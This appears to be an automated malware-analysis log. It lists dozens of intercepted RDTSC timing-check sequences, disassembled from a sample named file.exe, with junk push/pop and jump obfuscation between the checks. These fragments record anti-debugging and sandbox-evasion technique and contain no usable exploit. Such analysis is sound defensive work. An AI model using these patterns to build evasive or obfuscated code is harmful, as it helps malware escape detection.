Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE3AD second address: 2DE3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D7Dh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnp 00007FE2E9211D76h 0x00000011 jmp 00007FE2E9211D84h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE3E3 second address: 2DE3FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE2E9231EACh 0x00000008 jng 00007FE2E9231EA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0DDD second address: 2E0E6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE2E9211D86h 0x0000000c jp 00007FE2E9211D76h 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 jmp 00007FE2E9211D82h 0x0000001e pop eax 0x0000001f mov eax, dword ptr [eax] 0x00000021 jg 00007FE2E9211D84h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push edi 0x0000002c jmp 00007FE2E9211D86h 0x00000031 pop edi 0x00000032 pop eax 0x00000033 mov dword ptr [ebp+122D1B5Dh], ecx 0x00000039 lea ebx, dword ptr [ebp+12455C44h] 0x0000003f xor dx, 5EB9h 0x00000044 mov edi, dword ptr [ebp+122D3706h] 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0E6A second address: 2E0E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE2E9231EB7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0E92 second address: 2E0E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0F4A second address: 2E0F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE2E9231EACh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 jg 00007FE2E9231EA8h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0F6B second address: 2E0F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D83h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E0F8D second address: 2E1042 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE2E9231EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c xor cl, FFFFFF95h 0x0000000f mov dword ptr [ebp+122D181Eh], eax 0x00000015 push 00000003h 0x00000017 mov dword ptr [ebp+122D19FDh], ebx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FE2E9231EA8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 mov cl, 41h 0x0000003b push 00000003h 0x0000003d xor dword ptr [ebp+122D2A8Ah], esi 0x00000043 push B7891A3Eh 0x00000048 jmp 00007FE2E9231EB8h 0x0000004d add dword ptr [esp], 0876E5C2h 0x00000054 adc edx, 2E3732ABh 0x0000005a lea ebx, dword ptr [ebp+12455C4Dh] 0x00000060 push 00000000h 0x00000062 push ecx 0x00000063 call 00007FE2E9231EA8h 0x00000068 pop ecx 0x00000069 mov dword ptr [esp+04h], ecx 0x0000006d add dword ptr [esp+04h], 0000001Ah 0x00000075 inc ecx 0x00000076 push ecx 0x00000077 ret 0x00000078 pop ecx 0x00000079 ret 0x0000007a push eax 0x0000007b pushad 0x0000007c pushad 0x0000007d jmp 00007FE2E9231EB9h 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2E1182 second address: 2E11B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007FE2E9211D7Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jng 00007FE2E9211D7Eh 0x00000018 jnp 00007FE2E9211D78h 0x0000001e push esi 0x0000001f pop esi 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C63B7 second address: 2C63CF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE2E9231EA6h 0x00000008 jp 00007FE2E9231EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 js 00007FE2E9231EA6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C63CF second address: 2C63E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C63E1 second address: 2C63FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FFD0B second address: 2FFD26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 js 00007FE2E9211D7Ch 0x0000000c ja 00007FE2E9211D76h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FFD26 second address: 2FFD2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2FFF09 second address: 2FFF1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE2E9211D76h 0x0000000a popad 0x0000000b js 00007FE2E9211D7Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3003AB second address: 3003AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3003AF second address: 3003DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE2E9211D87h 0x0000000b popad 0x0000000c push edi 0x0000000d jbe 00007FE2E9211D82h 0x00000013 jns 00007FE2E9211D76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300532 second address: 300536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300536 second address: 30053A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300659 second address: 300664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300B2F second address: 300B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300E1B second address: 300E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE2E9231EA6h 0x0000000a jmp 00007FE2E9231EADh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300F7B second address: 300F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300F81 second address: 300F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FE2E9231EAAh 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300F96 second address: 300F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300F9C second address: 300FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300FA0 second address: 300FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300FA9 second address: 300FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 300FAF second address: 300FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 301739 second address: 301747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EAAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 301747 second address: 30174B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30174B second address: 301764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE2E9231EADh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 301764 second address: 301768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 301768 second address: 3017C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FE2E9231EB2h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007FE2E9231EB7h 0x0000001c jmp 00007FE2E9231EAAh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 301908 second address: 30190F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30190F second address: 301917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 301A94 second address: 301AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE2E9211D7Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308376 second address: 30837B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 306B73 second address: 306B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 308446 second address: 30844B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30844B second address: 308450 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 309875 second address: 309885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 309885 second address: 30989C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D83h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30989C second address: 3098AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007FE2E9231EBDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3098AD second address: 3098CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D81h 0x00000009 jnp 00007FE2E9211D82h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3098CA second address: 3098E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE2E9231EA6h 0x0000000a pushad 0x0000000b jmp 00007FE2E9231EB1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C48CF second address: 2C48E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE2E9211D7Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C48E6 second address: 2C4902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007FE2E9231EB5h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C4902 second address: 2C4928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE2E9211D81h 0x00000008 jmp 00007FE2E9211D80h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C7F13 second address: 2C7F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB7h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30CF96 second address: 30CFA3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE2E9211D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30CFA3 second address: 30CFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310470 second address: 31048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D89h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31048F second address: 310494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 310494 second address: 31049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31049A second address: 31049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31049E second address: 3104A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30F94B second address: 30F963 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE2E9231EAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FE2E9231EA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30FD5B second address: 30FD75 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE2E9211D7Eh 0x00000008 js 00007FE2E9211D7Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 30FD75 second address: 30FD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jno 00007FE2E9231EA6h 0x00000011 jmp 00007FE2E9231EAFh 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313F8C second address: 313FC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE2E9211D82h 0x00000008 jmp 00007FE2E9211D89h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jng 00007FE2E9211D76h 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31417B second address: 314185 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE2E9231EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 314374 second address: 31437B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 314B89 second address: 314B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 314B8D second address: 314B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 314CC4 second address: 314CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE2E9231EABh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 314CD6 second address: 314CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3150AD second address: 3150B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 315F2F second address: 315FB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE2E9211D88h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov esi, ebx 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D1C7Ch] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007FE2E9211D78h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 call 00007FE2E9211D80h 0x0000003d mov esi, dword ptr [ebp+122D180Eh] 0x00000043 pop edi 0x00000044 xchg eax, ebx 0x00000045 push esi 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 pop edx 0x0000004a pop esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f jnc 00007FE2E9211D76h 0x00000055 pop ecx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316F45 second address: 316F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316F49 second address: 316F4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 316F4F second address: 316F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3179DE second address: 3179F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3179F7 second address: 3179FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3179FD second address: 317A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 317A01 second address: 317A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and esi, 66C01FE3h 0x0000000f push 00000000h 0x00000011 or di, 15A0h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FE2E9231EA8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31A0D4 second address: 31A0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE2E9211D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31DB22 second address: 31DB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31DB26 second address: 31DB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FE2E9211D78h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31E9C6 second address: 31E9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31DCF5 second address: 31DCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31FAB5 second address: 31FABF instructions: 0x00000000 rdtsc 0x00000002 js 00007FE2E9231EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 322B3B second address: 322B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 322B48 second address: 322B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EAAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 322B56 second address: 322B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 322B5E second address: 322B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FE2E9231EA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32982A second address: 32982F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
